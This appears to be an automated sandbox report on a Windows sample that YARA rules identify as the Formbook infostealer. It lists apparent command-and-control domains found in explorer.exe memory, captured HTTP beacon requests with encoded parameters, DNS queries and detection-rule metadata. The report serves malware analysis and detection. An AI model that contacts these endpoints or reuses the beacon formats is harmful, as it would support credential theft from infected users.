          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tqmsn.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tqmsn.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tqmsn.com/bp31/www.odisexport.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tqmsn.comReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turdfi.xyz
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turdfi.xyz/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turdfi.xyz/bp31/www.biddrivego.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turdfi.xyzReferer:
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.videopromarket.com
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.videopromarket.com/bp31/
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.videopromarket.com/bp31/www.turdfi.xyz
          Source: explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.videopromarket.comReferer:
          Source: explorer.exe, 00000004.00000000.2081190838.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4544685051.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000003.3095509048.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2076988061.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000002.4540698292.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000000.2076988061.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4537110885.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000000.2076134694.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4532933943.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094472883.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000004.00000003.3842161318.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4541836056.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000002.4541926212.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841493381.0000000009C92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000004.00000002.4544685051.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2081190838.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000002.4540698292.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000004.00000002.4540698292.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: unknownDNS traffic detected: queries for: www.fnb.gay
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74DF82 getaddrinfo,setsockopt,recv,4_2_0E74DF82
          Source: global trafficHTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOv HTTP/1.1Host: www.millerstoehr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk HTTP/1.1Host: www.biddrivego.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcp HTTP/1.1Host: www.cascadefinnish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4 HTTP/1.1Host: www.alnawrasalrahhal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcp HTTP/1.1Host: www.tqmsn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4547308540.000000000E765000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: UgHXEfw1uL.exe PID: 2668, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: UgHXEfw1uL.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.UgHXEfw1uL.exe.7500000.7.raw.unpack, -Module-.csLarge array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
          Source: 0.2.UgHXEfw1uL.exe.2bd1438.5.raw.unpack, -Module-.csLarge array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
          Source: UgHXEfw1uL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.UgHXEfw1uL.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.UgHXEfw1uL.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4547308540.000000000E765000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: UgHXEfw1uL.exe PID: 2668, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: UgHXEfw1uL.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_00E4E0240_2_00E4E024
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3E5F80_2_05E3E5F8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3A0780_2_05E3A078
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E38DC00_2_05E38DC0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3AF580_2_05E3AF58
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3EF300_2_05E3EF30
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3E9F80_2_05E3E9F8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3E5E80_2_05E3E5E8
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3D5610_2_05E3D561
